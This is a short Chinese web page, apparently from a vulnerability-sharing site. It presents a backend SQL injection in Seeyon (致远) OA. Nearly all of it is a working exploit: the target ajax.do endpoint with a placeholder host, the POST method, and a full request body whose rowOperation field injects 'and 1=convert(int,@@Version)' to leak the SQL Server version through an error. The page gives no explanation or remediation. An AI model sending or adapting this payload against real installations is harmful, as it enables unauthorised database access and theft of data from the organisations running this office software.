致远OA 后台SQL注入漏洞

http://xxxxx.com/seeyon/ajax.do?method=ajaxAction&managerName=resultAjaxManager&rnd=19125

POST

managerMethod=queryTableResult&arguments=[{"page":1,"size":50,"designId":"xx","userConditions":[{"leftChar":"(","aliasTableName":"meeting_0","fieldName":"begin_date","operation":"GreatEqual","fieldValue":"","rightChar":")","rowOperation":"and"},{"leftChar":"(","aliasTableName":"meeting_0","fieldName":"begin_date","operation":"LessEqual","fieldValue":"","rightChar":")","rowOperation":"and 1=convert(int,@@Version) and "},{"leftChar":"(","aliasTableName":"org_member_1","fieldName":"ORG_DEPARTMENT_ID","operation":"Equal","fieldValue":"","rightChar":"","rowOperation":"or"},{"leftChar":"","aliasTableName":"org_member_1","fieldName":"ORG_DEPARTMENT_ID","operation":"Equal","fieldValue":["Department|-","Department|","Department|","Department|","Department|","Department|-","Department|","Department|-","Department|","Department|"],"rightChar":")","rowOperation":"and"},{"leftChar":"(","aliasTableName":"meeting_0","fieldName":"room","operation":"Equal","fieldValue":[{"id":"room","value":"-1"}],"rightChar":")","rowOperation":"and"},{"leftChar":"(","aliasTableName":"meeting_0","fieldName":"meet_place","operation":"Like","fieldValue":"1","rightChar":")","rowOperation":"and"},{"leftChar":"(","aliasTableName":"meeting_0","fieldName":"state","operation":"Equal","fieldValue":[{"id":"sate","value":"10"},{"id":"sate","value":"20"},{"id":"sate","value":"30"},{"id":"sate","value":"31"},{"id":"sate","value":"-10"}],"rightChar":")","rowOperation":"and"}],"customOrderFields":[],"needTotal":true,"viewModel":"view","extParams":{}}]

感谢您的来访，获取更多精彩文章请收藏本站。